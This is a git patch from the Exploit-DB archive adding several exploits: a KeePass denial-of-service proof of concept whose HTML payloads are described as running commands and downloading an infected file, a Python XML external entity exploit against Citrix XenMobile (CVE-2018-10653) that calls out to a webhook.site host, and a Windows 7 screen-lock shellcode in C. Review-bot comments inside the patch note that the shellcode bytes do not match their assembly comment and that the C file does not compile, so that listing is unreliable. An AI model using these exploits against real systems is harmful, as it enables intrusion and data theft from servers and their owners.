From 82e6691834ca87d870b660ed162b2762c7b24143 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Jan 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-01-23 4 changes to exploits/shellcodes KeePass 2.44 - Denial of Service (PoC) Citrix XenMobile Server 10.8 - XML External Entity Injection Windows/7 - Screen Lock Shellcode (9 bytes) --- exploits/multiple/dos/47952.txt | 109 +++++++++++++++++++++++++++++++ exploits/windows/local/47950.txt | 11 ---- exploits/xml/webapps/47951.py | 47 +++++++++++++ files_exploits.csv | 2 + files_shellcodes.csv | 1 + shellcodes/windows/47953.c | 31 +++++++++ 6 files changed, 190 insertions(+), 11 deletions(-) create mode 100644 exploits/multiple/dos/47952.txt create mode 100755 exploits/xml/webapps/47951.py create mode 100644 shellcodes/windows/47953.c diff --git a/exploits/multiple/dos/47952.txt b/exploits/multiple/dos/47952.txt new file mode 100644 index 000000000..826ef9c12 --- /dev/null +++ b/exploits/multiple/dos/47952.txt @@ -0,0 +1,109 @@ +# Exploit Title : KeePass 2.44 - Denial of Service (PoC) +# Product : KeePass Password Safe +# Version : < 2.44 +# Date: 2020-01-22 +# Vendor Homepage: https://keepass.info/ +# Exploit Author: Mustafa Emre Gül +# Website: https://emregul.com.tr/ +# Tested On : Win10 x64 +# Description : The free, open source, light-weight and easy-to-use password manager. + + +PoC: +Open KeePass > Help > About KeePass > Help (any local help area) > +Drag&Drop HTML File + +Save the contents to html. + + +Payload-1: +(DoS & Run Cmd) + + + + + + +Payload-2: +(run iexplorer.exe & download infected file) + + + +Edition Mode Active + \ No newline at end of file diff --git a/exploits/windows/local/47950.txt b/exploits/windows/local/47950.txt index 5d9e87f28..bb8dfa2f3 100644 --- a/exploits/windows/local/47950.txt +++ b/exploits/windows/local/47950.txt 
@@ -157,13 +157,6 @@ chunk_sz=5 #number of bytes we must decrypt the password by. #Apparition Security #=================================================== -def haslib(lib): - if not lib in (name for loader, name, ispkg in iter_modules()): - print("[!] "+lib+ " does not exist, pip install "+lib) - exit() - return True - - def carbonftp_conf(conf_file): p="" pipe=-1 @@ -325,8 +318,6 @@ def main(args): global passwd_str, sz victim="" - haslib("clint") - if args.user and args.encrypted_password: print("[!] Supply a victims username -u or single encrypted password -p, not both.") exit() @@ -380,8 +371,6 @@ if __name__=="__main__": main(parse_args()) - - [POC Video URL] https://www.youtube.com/watch?v=q9LMvAl6LfE diff --git a/exploits/xml/webapps/47951.py b/exploits/xml/webapps/47951.py new file mode 100755 index 000000000..b8b331b85 --- /dev/null +++ b/exploits/xml/webapps/47951.py 
@@ -0,0 +1,47 @@ +# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection +# Google Dork: inurl:zdm logon +# Date: 2019-11-28 +# Exploit Author: Jonas Lejon +# Vendor Homepage: https://www.citrix.com +# Software Link: +# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3 +# Tested on: XenMobile +# CVE : CVE-2018-10653 + +#!/usr/bin/python3 +## +## PoC exploit test for the security vulnerability CVE-2018-10653 in +XenMobile Server 10.8 before RP2 and 10.7 before RP3 +## +## This PoC was written by Jonas Lejon 2019-11-28 + https://triop.se +## Reported to Citrix 2017-10, patch released 2018-05 +## + +import requests +import sys +from pprint import pprint +import uuid + +# Surf to https://webhook.site and copy/paste the URL below. Used for +XXE callback +WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/" + +id = str(uuid.uuid1()) + +xml = '''%j00t9; ]>''' + +print(id) + +response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False, + headers= +{'User-Agent': 'MDM/1.0', +'Connection': 'close', +'Content-Type': 'application/x-apple-aspen-mdm'}, +data=xml,stream=True +) +print(response.content) +print(response.text) +pprint(response) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4978c08e6..cfe324f53 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
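Review bot: `#!/usr/bin/python3` sits on the eleventh line of the new file, after the `# Exploit Title` header block, so it is only a comment there; a shebang selects the interpreter only when it is the first line of the file. `sys.argv[1]` in the `requests.put(...)` call is read without a length check, so invoking the script with no argument ends in an `IndexError` instead of a usage message, e.g. `if len(sys.argv) != 2: sys.exit(f"usage: {sys.argv[0]} <base-url>")`. `id = str(uuid.uuid1())` shadows the builtin `id`, and `verify=False` silently disables TLS certificate validation on every run, which would be better as an explicit opt-in flag than a hard-coded default. The `xml` literal between `id = ...` and `print(id)` is not fully visible in this hunk, so whether `id` and `WEBHOOK` are actually used in it cannot be confirmed from here.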
@@ -6660,6 +6660,7 @@ id,file,description,date,author,type,platform,port
 47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
+47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42251,3 +42252,4 @@ id,file,description,date,author,type,platform,port
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,
+47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e115ce87d..621d1bf6d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1012,3 +1012,4 @@ id,file,description,date,author,type,platform
 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
 47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
 47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
+47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
diff --git a/shellcodes/windows/47953.c b/shellcodes/windows/47953.c
new file mode 100644
index 000000000..7807aa510
--- /dev/null
+++ b/shellcodes/windows/47953.c
@@ -0,0 +1,31 @@
+# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
+# Author: Saswat Nayak
+# Date: 2020-01-22
+# Shellcode length 9
+# Tested on: Win 7 SP1-64
+
+/*
+***** Assembly code follows *****
+xor eax,eax
+xor ebx,ebx
+xor ecx,ecx
+mov eax,0x00000002
+mov ebx,0x00020000
+push ebx
+push al
+mov ecx,0x77661497
+call ecx
+
+
+*/
+
+char code[]=
+
+"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file
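Review bot: The five header lines from `# Title: …` through `# Tested on: …` at the top of the new file are bare `#` lines outside any comment, which the C preprocessor rejects as invalid directives, so the listing does not compile as committed; they belong inside the `/* … */` block that follows them. The assembly in that comment also does not describe `code[]`: `\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0` decodes as `xor eax,eax; mov eax,0x7767866F; call eax`, while the comment shows `mov ebx`, two pushes and `call ecx` to `0x77661497` (and `push al` is not an encodable x86 instruction), so a reader cannot verify the 9 bytes against the text. One of the two should be corrected so they agree, and the absolute address should be documented as specific to the stated test build, since nothing in the file resolves it at runtime. In `main`, the `(int)` cast on the discarded call result is a no-op and `argc`/`argv` are unused; `int main(void)` with a plain `func();` would be the conventional form.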